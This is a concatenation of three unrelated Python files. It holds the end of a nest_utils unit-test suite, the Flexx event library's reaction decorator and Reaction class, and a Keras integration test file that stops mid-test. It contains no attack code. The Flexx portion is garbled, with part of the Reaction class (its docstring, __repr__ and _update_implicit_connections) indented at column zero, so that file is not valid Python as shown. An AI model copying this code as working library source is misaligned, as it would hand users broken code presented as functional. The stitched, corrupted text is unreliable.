      tf.nest.assert_same_structure(specs, array)
    assert_shapes = lambda a: self.assertEqual(a.shape, shape)
    tf.nest.map_structure(assert_shapes, unbatched_arrays)

  def testUnstackNestedArraysIntoFlatItems(self):
    """Flat-item unstacking matches flattening each unstacked nest."""
    shape = (5, 8)
    batch_size = 3
    specs = self.nest_spec(shape)
    batched_arrays = self.zeros_from_spec(specs, outer_dims=[batch_size])
    unbatched_flat_items = nest_utils.unstack_nested_arrays_into_flat_items(
        batched_arrays)
    self.assertEqual(batch_size, len(unbatched_flat_items))
    for nested_array, flat_item in zip(
        nest_utils.unstack_nested_arrays(batched_arrays), unbatched_flat_items):
      self.assertAllEqual(flat_item, tf.nest.flatten(nested_array))
      tf.nest.assert_same_structure(specs,
                                    tf.nest.pack_sequence_as(specs, flat_item))
    assert_shapes = lambda a: self.assertEqual(a.shape, shape)
    tf.nest.map_structure(assert_shapes, unbatched_flat_items)

  def testUnstackNestedArray(self):
    """Unstacking works for a batch of size 1."""
    shape = (5, 8)
    batch_size = 1
    specs = self.nest_spec(shape)
    batched_arrays = self.zeros_from_spec(specs, outer_dims=[batch_size])
    unbatched_arrays = nest_utils.unstack_nested_arrays(batched_arrays)
    self.assertEqual(batch_size, len(unbatched_arrays))
    for array in unbatched_arrays:
      tf.nest.assert_same_structure(specs, array)
    assert_shapes = lambda a: self.assertEqual(a.shape, shape)
    tf.nest.map_structure(assert_shapes, unbatched_arrays)

  def testStackNestedArrays(self):
    """Stacking nests of arrays adds a leading batch dimension."""
    shape = (5, 8)
    batch_size = 3
    batched_shape = (batch_size,) + shape
    specs = self.nest_spec(shape)
    unstacked_arrays = [self.zeros_from_spec(specs) for _ in range(batch_size)]
    stacked_array = nest_utils.stack_nested_arrays(unstacked_arrays)
    tf.nest.assert_same_structure(specs, stacked_array)
    assert_shapes = lambda a: self.assertEqual(a.shape, batched_shape)
    tf.nest.map_structure(assert_shapes, stacked_array)

  def testGetOuterArrayShape(self):
    """get_outer_array_shape reports (), (batch,), and (batch, time)."""
    spec = (
        array_spec.ArraySpec([5, 8], np.float32),
        (array_spec.ArraySpec([1], np.int32),
         array_spec.ArraySpec([2, 2, 2], np.float32))
    )
    batch_size = 3
    unstacked_arrays = [self.zeros_from_spec(spec) for _ in range(batch_size)]
    outer_dims = nest_utils.get_outer_array_shape(unstacked_arrays[0], spec)
    self.assertEqual((), outer_dims)
    stacked_array = nest_utils.stack_nested_arrays(unstacked_arrays)
    outer_dims = nest_utils.get_outer_array_shape(stacked_array, spec)
    self.assertEqual((batch_size,), outer_dims)
    # Add a time dim of size 1, then stack: outer shape becomes (batch, 1).
    time_dim = [nest_utils.batch_nested_array(arr) for arr in unstacked_arrays]
    batch_time = nest_utils.stack_nested_arrays(time_dim)
    outer_dims = nest_utils.get_outer_array_shape(batch_time, spec)
    self.assertEqual((batch_size, 1), outer_dims)

  def testWhere(self):
    """nest_utils.where selects per-element from the true/false nests."""
    condition = tf.convert_to_tensor([True, False, False, True, False])
    true_output = tf.nest.map_structure(tf.convert_to_tensor,
                                        (np.array([0] * 5), np.arange(1, 6)))
    false_output = tf.nest.map_structure(tf.convert_to_tensor,
                                         (np.array([1] * 5), np.arange(6, 11)))
    result = nest_utils.where(condition, true_output, false_output)
    result = self.evaluate(result)
    expected = (np.array([0, 1, 1, 0, 1]), np.array([1, 7, 8, 4, 10]))
    self.assertAllEqual(expected, result)

  def testWhereDifferentRanks(self):
    """A rank-1 condition broadcasts over rank-2 outputs."""
    condition = tf.convert_to_tensor([True, False, False, True, False])
    true_output = tf.nest.map_structure(
        tf.convert_to_tensor,
        (np.reshape(np.array([0] * 10),
                    (5, 2)), np.reshape(np.arange(1, 11), (5, 2))))
    false_output = tf.nest.map_structure(
        tf.convert_to_tensor,
        (np.reshape(np.array([1] * 10),
                    (5, 2)), np.reshape(np.arange(12, 22), (5, 2))))
    result = nest_utils.where(condition, true_output, false_output)
    result = self.evaluate(result)
    expected = (np.array([[0, 0], [1, 1], [1, 1], [0, 0], [1, 1]]),
                np.array([[1, 2], [14, 15], [16, 17], [7, 8], [20, 21]]))
    self.assertAllEqual(expected, result)

  def testWhereSameRankDifferentDimension(self):
    """Size-1 true outputs broadcast against the condition's length."""
    condition = tf.convert_to_tensor([True, False, True])
    true_output = (tf.convert_to_tensor([1]), tf.convert_to_tensor([2]))
    false_output = (tf.convert_to_tensor([3, 4, 5]),
                    tf.convert_to_tensor([6, 7, 8]))
    result = nest_utils.where(condition, true_output, false_output)
    result = self.evaluate(result)
    expected = (np.array([1, 4, 1]), np.array([2, 7, 2]))
    self.assertAllEqual(expected, result)
class PruneExtraKeysTest(tf.test.TestCase):
  """Tests for nest_utils.prune_extra_keys."""

  def testPruneExtraKeys(self):
    """Entries of the wide structure absent from the narrow one are dropped."""
    self.assertEqual(nest_utils.prune_extra_keys({}, {'a': 1}), {})
    self.assertEqual(nest_utils.prune_extra_keys((), {'a': 1}), ())
    self.assertEqual(nest_utils.prune_extra_keys(
        {'a': 1}, {'a': 'a'}), {'a': 'a'})
    self.assertEqual(
        nest_utils.prune_extra_keys({'a': 1}, {'a': 'a', 'b': 2}), {'a': 'a'})
    self.assertEqual(
        nest_utils.prune_extra_keys([{'a': 1}], [{'a': 'a', 'b': 2}]),
        [{'a': 'a'}])
    # An empty-container leaf in the narrow structure stops recursion there.
    self.assertEqual(
        nest_utils.prune_extra_keys({'a': (), 'b': None}, {'a': 1, 'b': 2}),
        {'a': (), 'b': 2})
    self.assertEqual(
        nest_utils.prune_extra_keys(
            {'a': {'aa': 1, 'ab': 2}, 'b': {'ba': 1}},
            {'a': {'aa': 'aa', 'ab': 'ab', 'ac': 'ac'},
             'b': {'ba': 'ba', 'bb': 'bb'},
             'c': 'c'}),
        {'a': {'aa': 'aa', 'ab': 'ab'}, 'b': {'ba': 'ba'}})
    self.assertEqual(
        nest_utils.prune_extra_keys(
            {'a': ()},
            DictWrapper({'a': DictWrapper({'b': None})})),
        {'a': ()})
    self.assertEqual(
        nest_utils.prune_extra_keys(
            {'a': 1, 'c': 2},
            DictWrapper({'a': DictWrapper({'b': None})})),
        {'a': {'b': None}})

  def testInvalidWide(self):
    """If wide cannot be matched to narrow, it is returned unchanged."""
    self.assertEqual(nest_utils.prune_extra_keys(None, {'a': 1}), {'a': 1})
    self.assertEqual(nest_utils.prune_extra_keys({'a': 1}, {}), {})
    self.assertEqual(nest_utils.prune_extra_keys(
        {'a': 1}, {'c': 'c'}), {'c': 'c'})
    self.assertEqual(nest_utils.prune_extra_keys([], ['a']), ['a'])
    self.assertEqual(
        nest_utils.prune_extra_keys([{}, {}], [{'a': 1}]), [{'a': 1}])

  def testNamedTuple(self):
    """Pruning recurses into namedtuple fields."""
    class A(collections.namedtuple('A', ('a', 'b'))):
      pass
    self.assertEqual(
        nest_utils.prune_extra_keys(
            [A(a={'aa': 1}, b=3), {'c': 4}],
            [A(a={'aa': 'aa', 'ab': 'ab'}, b='b'), {'c': 'c', 'd': 'd'}]),
        [A(a={'aa': 'aa'}, b='b'), {'c': 'c'}])

  def testSubtypesOfListAndDict(self):
    """Pruning preserves trackable wrapper subtypes of list/dict/tuple."""
    class A(collections.namedtuple('A', ('a', 'b'))):
      pass
    self.assertEqual(
        nest_utils.prune_extra_keys(
            [data_structures.ListWrapper([None, DictWrapper({'a': 3, 'b': 4})]),
             None,
             TupleWrapper((DictWrapper({'g': 5}),)),
             TupleWrapper(A(None, DictWrapper({'h': 6}))),
            ],
            [['x', {'a': 'a', 'b': 'b', 'c': 'c'}],
             'd',
             ({'g': 'g', 'gg': 'gg'},),
             A(None, {'h': 'h', 'hh': 'hh'}),
            ]),
        [data_structures.ListWrapper([
            'x', DictWrapper({'a': 'a', 'b': 'b'})]),
         'd',
         TupleWrapper((DictWrapper({'g': 'g'}),)),
         TupleWrapper(A(None, DictWrapper({'h': 'h'}),)),
        ])

  def testOrderedDict(self):
    """Pruning works on OrderedDicts and preserves key order."""
    OD = collections.OrderedDict  # pylint: disable=invalid-name
    self.assertEqual(
        nest_utils.prune_extra_keys(
            OD([('a', OD([('aa', 1), ('ab', 2)])),
                ('b', OD([('ba', 1)]))]),
            OD([('a', OD([('aa', 'aa'), ('ab', 'ab'), ('ac', 'ac')])),
                ('b', OD([('ba', 'ba'), ('bb', 'bb')])),
                ('c', 'c')])),
        OD([('a', OD([('aa', 'aa'), ('ab', 'ab')])),
            ('b', OD([('ba', 'ba')]))])
    )
class TileBatchTest(tf.test.TestCase):
  """Tests for nest_utils.tile_batch."""

  def test_tile_batch(self):
    """Each batch entry is repeated `multiplier` times along axis 0."""
    original = tf.constant([[1., 2., 3.], [4., 5., 6.]])
    tiled = nest_utils.tile_batch(original, 2)
    expected = tf.constant(
        [[1., 2., 3.], [1., 2., 3.], [4., 5., 6.], [4., 5., 6.]])
    self.assertAllEqual(self.evaluate(expected), self.evaluate(tiled))
    self.assertAllEqual((4, 3), tiled.shape)
# Standard TensorFlow test runner entry point.
if __name__ == '__main__':
  tf.test.main()
|
|
"""
Implements the reaction decorator, class and desciptor.
"""
# Note: there are some unusual constructs here, such as ``if xx is True``.
# These are there to avoid inefficient JS code as this code is transpiled
# using PScript. This code is quite performance-critical.
import weakref
import inspect
from ._loop import this_is_js
from ._action import BaseDescriptor
from ._dict import Dict
from . import logger
# NOTE(review): ``window`` appears to be a placeholder for the browser's
# global ``window`` object when this module runs as transpiled JS — confirm.
window = None
# Alias the logger as ``console`` so calls like ``console.warn(...)`` work
# both in Python and in transpiled JS.
console = logger
def looks_like_method(func):
    """ Return whether *func* looks like an (unbound) method: a plain
    function whose first parameter is named 'self' or 'this'.
    """
    # Bound methods expose __func__; those are not unbound methods.
    if hasattr(func, '__func__'):
        return False
    try:
        params = list(inspect.signature(func).parameters)
    except (TypeError, ValueError):
        return False
    if not params:
        return False
    return params[0] in ('self', 'this')
def reaction(*connection_strings, mode='normal'):
    """ Decorator to turn a method of a Component into a
    :class:`Reaction <flexx.event.Reaction>`.

    A reaction can be connected to multiple event types. Each connection
    string represents an event type to connect to.

    Also see the
    :func:`Component.reaction() <flexx.event.Component.reaction>` method.

    .. code-block:: py

        class MyObject(event.Component):

            @event.reaction('first_name', 'last_name')
            def greet(self, *events):
                print('hello %s %s' % (self.first_name, self.last_name))

    A reaction can operate in a few different modes. By not specifying any
    connection strings, the mode is "auto": the reaction will automatically
    trigger when any of the properties used in the function changes.
    See :func:`get_mode() <flexx.event.Reaction.get_mode>` for details.

    Connection string follow the following syntax rules:

    * Connection strings consist of parts separated by dots, thus forming a path.
      If an element on the path is a property, the connection will automatically
      reset when that property changes (a.k.a. dynamism, more on this below).
    * Each part can end with one star ('*'), indicating that the part is a list
      and that a connection should be made for each item in the list.
    * With two stars, the connection is made *recursively*, e.g. "children**"
      connects to "children" and the children's children, etc.
    * Stripped of '*', each part must be a valid identifier (ASCII).
    * The total string optionally has a label suffix separated by a colon. The
      label itself may consist of any characters.
    * The string can have a "!" at the very start to suppress warnings for
      connections to event types that Flexx is not aware of at initialization
      time (i.e. not corresponding to a property or emitter).

    An extreme example could be ``"!foo.children**.text:mylabel"``, which connects
    to the "text" event of the children (and their children, and their children's
    children etc.) of the ``foo`` attribute. The "!" is common in cases like
    this to suppress warnings if not all children have a ``text`` event/property.
    """
    if not connection_strings:
        raise TypeError('reaction() needs one or more arguments.')

    # Validate mode parameter
    mode = mode or 'normal'  # i.e. allow None
    if not isinstance(mode, str):
        raise TypeError('Reaction mode must be a string.')
    mode = mode.lower()
    if mode not in ('normal', 'greedy', 'auto'):
        # Bug fix: the message previously read 'must "normal"' (missing "be").
        raise TypeError('Reaction mode must be "normal", "greedy" or "auto".')

    # Extract function if we can; bare usage as ``@reaction`` passes the
    # decorated function as the single positional argument.
    func = None
    if len(connection_strings) == 1 and callable(connection_strings[0]):
        func = connection_strings[0]
        connection_strings = []

    for s in connection_strings:
        if not (isinstance(s, str) and len(s) > 0):
            raise TypeError('Connection string must be nonempty strings.')

    def _connect(func):
        if not callable(func):
            raise TypeError('reaction() decorator requires a callable.')
        if not looks_like_method(func):
            raise TypeError('reaction() decorator requires a method '
                            '(first arg must be self).')
        return ReactionDescriptor(func, mode, connection_strings)

    if func is not None:
        return _connect(func)
    else:
        return _connect
class ReactionDescriptor(BaseDescriptor):
    """ Class descriptor for reactions.

    Stores the reaction function plus its mode and connection strings, and
    lazily creates (and caches) one Reaction object per component instance
    on first attribute access.
    """

    def __init__(self, func, mode, connection_strings, ob=None):
        self._name = func.__name__
        self._func = func
        self._mode = mode
        # With no connection strings, the reaction tracks the properties it
        # uses and reconnects automatically; see Reaction.get_mode().
        if len(connection_strings) == 0:
            self._mode = 'auto'
        self._connection_strings = connection_strings
        # Optional explicit owner object, stored weakly to avoid cycles.
        self._ob = None if ob is None else weakref.ref(ob)
        self.__doc__ = self._format_doc('reaction', self._name, func.__doc__)

    def __get__(self, instance, owner):
        # Accessed on the class itself: return the descriptor.
        if instance is None:
            return self
        private_name = '_' + self._name + '_reaction'
        try:
            reaction = getattr(instance, private_name)
        except AttributeError:
            # First access for this instance: create and cache the Reaction.
            reaction = Reaction(instance if self._ob is None else self._ob(),
                                (self._func, instance),
                                self._mode,
                                self._connection_strings)
            setattr(instance, private_name, reaction)
        # Make the reaction use *our* func one time. In most situations
        # this is the same function that the reaction has, but not when
        # using super(); i.e. this allows a reaction to call the same
        # reaction of its super class.
        reaction._use_once(self._func)
        return reaction

    @property
    def local_connection_strings(self):
        """ List of connection strings that are local to the object
        (i.e. do not contain a dot-separated path).
        """
        # This is used in e.g. flexx.app
        return [s for s in self._connection_strings if '.' not in s]
class Reaction:
""" Reaction objects are wrappers around Component methods. They connect
to one or more events. This class should not be instantiated directly;
use ``event.reaction()`` or ``Component.reaction()`` instead.
"""
_count = 0
    def __init__(self, ob, func, mode, connection_strings):
        """ Store weak references to the owning component and the (optional)
        method target, normalize the function, and set up connections.
        """
        Reaction._count += 1
        self._id = 'r%i' % Reaction._count  # to ensure a consistent event order
        # Store objects using a weakref.
        # - ob1 is the Component object of which the connect() method was called
        #   to create the reaction. Connection strings are relative to this object.
        # - ob2 is the object to be passed to func (if it is a method). Is often
        #   the same as ob1, but not per se. Can be None.
        self._ob1 = weakref.ref(ob)
        # Get unbound version of bound methods.
        self._ob2 = None  # if None, it's regarded a regular function
        if isinstance(func, tuple):
            self._ob2 = weakref.ref(func[1])
            func = func[0]
        if getattr(func, '__self__', None) is not None:  # builtin funcs have __self__
            if getattr(func, '__func__', None) is not None:
                self._ob2 = weakref.ref(func.__self__)
                func = func.__func__
        # Store func, name, and docstring (e.g. for sphinx docs)
        assert callable(func)
        assert mode in ('normal', 'greedy', 'auto')
        self._func = func
        self._func_once = func
        self._mode = mode
        self._name = func.__name__
        self.__doc__ = BaseDescriptor._format_doc('reaction', self._name, func.__doc__)
        self._init(connection_strings)
    def _init(self, connection_strings):
        """ Init of this reaction that is compatible with PScript.

        Parses each connection string into a connection record and makes
        the initial connections. Index-based loops and character-by-character
        identifier checks are deliberate for PScript transpilation.
        """
        ichars = '0123456789_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
        # Init explicit connections: (connection-object, type) tuples
        self._connections = []
        # Init implicit connections: (component, type) tuples
        self._implicit_connections = []
        # Notes on connection strings:
        # * The string can have a "!" at the start to suppress warnings for
        #   connections to unknown event types.
        # * The string can have a label suffix separated by a colon. The
        #   label may consist of any chars.
        # * Connection strings consist of parts separated by dots.
        # * Each part can end with one star ('*'), indicating that connections
        #   should be made for each item in the list, or two stars, indicating
        #   that connections should be made *recursively* for each item in the
        #   list (a.k.a. a deep connector).
        # * Stripped of '*', each part must be a valid identifier.
        # * An extreme example: "!foo.bar*.spam.eggs**:meh"
        for ic in range(len(connection_strings)):
            fullname = connection_strings[ic]
            # Separate label and exclamation mark from the string path
            force = fullname.startswith('!')
            s, _, label = fullname.lstrip('!').partition(':')
            s0 = s
            # Backwards compat: "foo.*.bar" becomes "foo*.bar"
            if '.*.' in s + '.':
                s = s.replace('.*', '*')
                console.warn('Connection string syntax "foo.*.bar" is deprecated, '
                             'use "%s" instead of "%s":.' % (s, s0))
            # Help put exclamation at the start
            if '!' in s:
                s = s.replace('!', '')
                force = True
                console.warn('Exclamation marks in connection strings must come at '
                             'the very start, use "!%s" instead of "%s".' % (s, s0))
            # Check that all parts are identifiers
            parts = s.split('.')
            for ipart in range(len(parts)):
                part = parts[ipart].rstrip('*')
                is_identifier = len(part) > 0
                for i in range(len(part)):
                    is_identifier = is_identifier and (part[i] in ichars)
                if is_identifier is False:
                    raise ValueError('Connection string %r contains '
                                     'non-identifier part %r' % (s, part))
            # Init connection
            d = Dict()  # don't do Dict(foo=x) bc PScript only supports that for dict
            self._connections.append(d)
            d.fullname = fullname  # original, used in logs, so is searchable
            d.parts = parts
            # The event type defaults to the reaction name as label.
            d.type = parts[-1].rstrip('*') + ':' + (label or self._name)
            d.force = force
            d.objects = []
        # Connect
        for ic in range(len(self._connections)):
            self.reconnect(ic)
def __repr__(self):
c = '+'.join([str(len(c.objects)) for c in self._connections])
cname = self.__class__.__name__
t = '<%s %r (%s) with %s connections at 0x%x>'
return t % (cname, self._name, self._mode, c, id(self))
    def get_mode(self):
        """ Get the mode for this reaction:

        * 'normal': events are handled in the order that they were emitted.
          Consequently, there can be multiple calls per event loop iteration
          if other reactions were triggered as well.
        * 'greedy': this reaction receives all its events (since the last event
          loop iteration) in a single call (even if this breaks the order of
          events with respect to other reactions). Use this when multiple related
          events must be handled simultaneously (e.g. when syncing properties).
        * 'auto': this reaction tracks what properties it uses, and is
          automatically triggered when any of these properties changes. Like
          'greedy' there is at most one call per event loop iteration.
          Reactions with zero connection strings always have mode 'auto'.

        The 'normal' mode generally offers the most consistent behaviour.
        The 'greedy' mode allows the event system to make some optimizations.
        Combined with the fact that there is at most one call per event loop
        iteration, this can provide higher performance where it matters.
        Reactions with mode 'auto' can be a convenient way to connect things
        up. Although it allows the event system to make the same optimizations
        as 'greedy', it also needs to reconnect the reaction after each time
        it is called, which can degrade performance especially if many
        properties are accessed by the reaction.
        """
        return self._mode
    def get_name(self):
        """ Get the name of this reaction, usually corresponding to the name
        of the function that this reaction wraps. The name is also used as
        the default label in connection type strings.
        """
        return self._name
    def get_connection_info(self):
        """ Get a list of tuples (name, connection_names), where
        connection_names is a list of type names (including label) for
        the made connections.
        """
        # Each item in c.objects is an (object, type-name) tuple; only the
        # type names are exposed here.
        return [(c.fullname, [u[1] for u in c.objects])
                for c in self._connections]
## Calling / handling
    def _use_once(self, func):
        """ Set the function to use for the next call only. Used by
        ReactionDescriptor.__get__ so that accessing a reaction via a
        subclass/super() invokes that class' version of the function once.
        """
        self._func_once = func
    def __call__(self, *events):
        """ Call the reaction function.
        """
        # Use the one-shot function (set via _use_once), then restore the
        # default for subsequent calls.
        func = self._func_once
        self._func_once = self._func
        if self._ob2 is not None:
            if self._ob2() is not None:
                res = func(self._ob2(), *events)
            else:  # pragma: no cover
                # We detected that the object that wants the events no longer exists
                self.dispose()
                return
        else:
            res = func(*events)
        return res
## Connecting
    def dispose(self):
        """ Disconnect all connections so that there are no more references
        to components. Safe to call multiple times; subsequent calls are no-ops.
        """
        if len(self._connections) == 0 and len(self._implicit_connections) == 0:
            return
        if not this_is_js():
            # Replace the weakref to the root component with a callable that
            # returns None, mimicking a dead weakref.
            self._ob1 = lambda: None
            logger.debug('Disposing reaction %r ' % self)
        while len(self._implicit_connections):
            ob, type = self._implicit_connections.pop(0)
            ob.disconnect(type, self)
        for ic in range(len(self._connections)):
            connection = self._connections[ic]
            while len(connection.objects) > 0:
                ob, type = connection.objects.pop(0)
                ob.disconnect(type, self)
        self._connections = []
def _update_implicit_connections(self, connections):
""" Update the list of implicit (i.e. automatic) connections.
Used by the loop.
"""
# Init - each connection is a (component, type) tuple
old_conns = self._implicit_connections
new_conns = connections
self._implicit_connections = new_conns
# Reconnect in a smart way
self._connect_and_disconnect(old_conns, new_conns)
    def _clear_component_refs(self, ob):
        """ Clear all references to the given Component instance. This is
        called from a Component's dispose() method. This reaction remains
        working, but won't receive events from that object anymore.
        """
        # Walk backwards so pop(i) does not shift items still to be visited
        for i in range(len(self._implicit_connections)-1, -1, -1):
            if self._implicit_connections[i][0] is ob:
                self._implicit_connections.pop(i)
        # Same for the objects of each explicit connection (mutate in place,
        # since the connection objects are referenced elsewhere)
        for ic in range(len(self._connections)):
            connection = self._connections[ic]
            for i in range(len(connection.objects)-1, -1, -1):
                if connection.objects[i][0] is ob:
                    connection.objects.pop(i)
    def reconnect(self, index):
        """ (re)connect the index'th connection.

        Re-resolves the connection's event path against the root object
        and swaps in the newly found (ob, type) pairs, reusing the
        connections that did not change.
        """
        connection = self._connections[index]
        # Prepare disconnecting
        old_objects = connection.objects  # (ob, type) tuples
        connection.objects = []
        # Obtain root object and setup connections
        ob = self._ob1()  # may return None once the root object is gone
        if ob is not None:
            # Fills connection.objects as a side effect
            self._seek_event_object(index, connection.parts, ob)
        new_objects = connection.objects
        # Verify
        if len(new_objects) == 0:
            raise RuntimeError('Could not connect to %r' % connection.fullname)
        # Reconnect in a smart way
        self._connect_and_disconnect(old_objects, new_objects, connection.force)
    def _connect_and_disconnect(self, old_objects, new_objects, force=False):
        """ Update connections by disconnecting old and connecting new,
        but try to keep connections that do not change.

        Both arguments are lists of (component, type) tuples. *force* is
        passed through to _register_reaction() for the new connections.
        """
        # Keep track of what connections we skip, i.e. which we should not remove.
        # Otherwise we may remove duplicate objects. See issue #460.
        should_stay = {}
        # Skip common objects from the start
        i1 = 0
        while (i1 < len(new_objects) and i1 < len(old_objects) and
               new_objects[i1][0] is old_objects[i1][0] and
               new_objects[i1][1] == old_objects[i1][1]):
            should_stay[new_objects[i1][0].id + '-' + new_objects[i1][1]] = True
            i1 += 1
        # Skip common objects from the end
        i2, i3 = len(new_objects) - 1, len(old_objects) - 1
        while (i2 >= i1 and i3 >= i1 and
               new_objects[i2][0] is old_objects[i3][0] and
               new_objects[i2][1] == old_objects[i3][1]):
            should_stay[new_objects[i2][0].id + '-' + new_objects[i2][1]] = True
            i2 -= 1
            i3 -= 1
        # Disconnect remaining old (skip pairs that also occur in a kept range)
        for i in range(i1, i3+1):
            ob, type = old_objects[i]
            if should_stay.get(ob.id + '-' + type, False) is False:
                ob.disconnect(type, self)
        # Connect remaining new
        for i in range(i1, i2+1):
            ob, type = new_objects[i]
            ob._register_reaction(type, self, force)
    def _seek_event_object(self, index, path, ob):
        """ Seek an event object based on the name (PScript compatible).
        The path is a list: the path to the event, the last element being the
        event type. Matching (ob, type) pairs are appended to the index'th
        connection's objects as a side effect.
        """
        connection = self._connections[index]
        # Should we make connection or stop?
        if ob is None or len(path) == 0:
            return  # We cannot seek further
        if len(path) == 1:
            # Path only consists of event type now: make connection
            # connection.type consists of event type name (no stars) plus a label
            if hasattr(ob, '_IS_COMPONENT'):
                connection.objects.append((ob, connection.type))
            # Reached end or continue?
            if not path[0].endswith('**'):
                return
        # Resolve name
        obname_full, path = path[0], path[1:]
        obname = obname_full.rstrip('*')
        selector = obname_full[len(obname):]
        # Internally, 3-star notation is used for optional selectors:
        # also try connecting as if this path element were absent (no return)
        if selector == '***':
            self._seek_event_object(index, path, ob)
        # Select object
        if hasattr(ob, '_IS_COMPONENT') and obname in ob.__properties__:
            # The name is a property: also connect to it (with a special
            # label) so this connection gets re-resolved when it changes
            name_label = obname + ':reconnect_' + str(index)
            connection.objects.append((ob, name_label))
            new_ob = getattr(ob, obname, None)
        else:
            new_ob = getattr(ob, obname, None)
        # Look inside? Note: "selector in '***'" is a substring test,
        # matching '*' and '**' (the empty selector is excluded by len())
        if len(selector) and selector in '***' and isinstance(new_ob, (tuple, list)):
            if len(selector) > 1:
                path = [obname + '***'] + path  # recurse (avoid insert for space)
            for isub in range(len(new_ob)):
                self._seek_event_object(index, path, new_ob[isub])
            return
        elif selector == '*':  # "**" is recursive, so allow more
            t = "Invalid connection {name_full} because {name} is not a tuple/list."
            raise RuntimeError(t.replace("{name_full}", obname_full)
                               .replace("{name}", obname))
        else:
            return self._seek_event_object(index, path, new_ob)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import dtypes
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import nn_ops as nn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.platform import test
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class VectorClassificationIntegrationTest(keras_parameterized.TestCase):
  """End-to-end train/evaluate/predict checks on small dense-vector data."""

  def test_vector_classification(self):
    np.random.seed(1337)
    (features, targets), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=0,
        input_shape=(10,),
        num_classes=2)
    targets = keras.utils.to_categorical(targets)
    layer_stack = [
        keras.layers.Dense(16, activation='relu'),
        keras.layers.Dropout(0.1),
        keras.layers.Dense(targets.shape[-1], activation='softmax'),
    ]
    model = testing_utils.get_model_from_layers(
        layer_stack, input_shape=features.shape[1:])
    model.compile(
        loss='categorical_crossentropy',
        optimizer=keras.optimizer_v2.adam.Adam(0.005),
        metrics=['acc'],
        run_eagerly=testing_utils.should_run_eagerly())
    history = model.fit(features, targets, epochs=10, batch_size=10,
                        validation_data=(features, targets),
                        verbose=2)
    # Validating on the training data itself, so accuracy should climb.
    self.assertGreater(history.history['val_acc'][-1], 0.7)
    _, val_acc = model.evaluate(features, targets)
    self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
    predictions = model.predict(features)
    self.assertEqual(predictions.shape, (features.shape[0], 2))

  def test_vector_classification_shared_model(self):
    # Test that Sequential models that feature internal updates
    # and internal losses can be shared.
    np.random.seed(1337)
    (features, targets), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=0,
        input_shape=(10,),
        num_classes=2)
    targets = keras.utils.to_categorical(targets)
    base_model = testing_utils.get_model_from_layers(
        [keras.layers.Dense(16,
                            activation='relu',
                            kernel_regularizer=keras.regularizers.l2(1e-5),
                            bias_regularizer=keras.regularizers.l2(1e-5)),
         keras.layers.BatchNormalization()],
        input_shape=features.shape[1:])
    inputs = keras.layers.Input(features.shape[1:])
    hidden = base_model(inputs)
    outputs = keras.layers.Dense(targets.shape[-1], activation='softmax')(hidden)
    model = keras.models.Model(inputs, outputs)
    model.compile(
        loss='categorical_crossentropy',
        optimizer=keras.optimizer_v2.adam.Adam(0.005),
        metrics=['acc'],
        run_eagerly=testing_utils.should_run_eagerly())
    if not testing_utils.should_run_eagerly():
      self.assertEqual(len(model.losses), 2)
      self.assertEqual(len(model.updates), 2)
    history = model.fit(features, targets, epochs=10, batch_size=10,
                        validation_data=(features, targets),
                        verbose=2)
    self.assertGreater(history.history['val_acc'][-1], 0.7)
    _, val_acc = model.evaluate(features, targets)
    self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
    predictions = model.predict(features)
    self.assertEqual(predictions.shape, (features.shape[0], 2))
# See b/122473407
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TimeseriesClassificationIntegrationTest(keras_parameterized.TestCase):
  """End-to-end checks for recurrent classifiers on small sequence data."""

  @keras_parameterized.run_with_all_model_types
  def test_timeseries_classification(self):
    np.random.seed(1337)
    (sequences, targets), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=0,
        input_shape=(4, 10),
        num_classes=2)
    targets = keras.utils.to_categorical(targets)
    recurrent_stack = [
        keras.layers.LSTM(5, return_sequences=True),
        keras.layers.GRU(targets.shape[-1], activation='softmax'),
    ]
    model = testing_utils.get_model_from_layers(
        recurrent_stack, input_shape=sequences.shape[1:])
    model.compile(
        loss='categorical_crossentropy',
        optimizer=keras.optimizer_v2.adam.Adam(0.005),
        metrics=['acc'],
        run_eagerly=testing_utils.should_run_eagerly())
    history = model.fit(sequences, targets, epochs=15, batch_size=10,
                        validation_data=(sequences, targets),
                        verbose=2)
    self.assertGreater(history.history['val_acc'][-1], 0.7)
    _, val_acc = model.evaluate(sequences, targets)
    self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
    predictions = model.predict(sequences)
    self.assertEqual(predictions.shape, (sequences.shape[0], 2))

  def test_timeseries_classification_sequential_tf_rnn(self):
    np.random.seed(1337)
    (sequences, targets), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=0,
        input_shape=(4, 10),
        num_classes=2)
    targets = keras.utils.to_categorical(targets)
    # Wrap the TF (non-Keras) RNN cells in keras.layers.RNN.
    model = keras.models.Sequential()
    model.add(keras.layers.RNN(rnn_cell.LSTMCell(5), return_sequences=True,
                               input_shape=sequences.shape[1:]))
    model.add(keras.layers.RNN(rnn_cell.GRUCell(targets.shape[-1],
                                                activation='softmax',
                                                dtype=dtypes.float32)))
    model.compile(
        loss='categorical_crossentropy',
        optimizer=keras.optimizer_v2.adam.Adam(0.005),
        metrics=['acc'],
        run_eagerly=testing_utils.should_run_eagerly())
    history = model.fit(sequences, targets, epochs=15, batch_size=10,
                        validation_data=(sequences, targets),
                        verbose=2)
    self.assertGreater(history.history['val_acc'][-1], 0.7)
    _, val_acc = model.evaluate(sequences, targets)
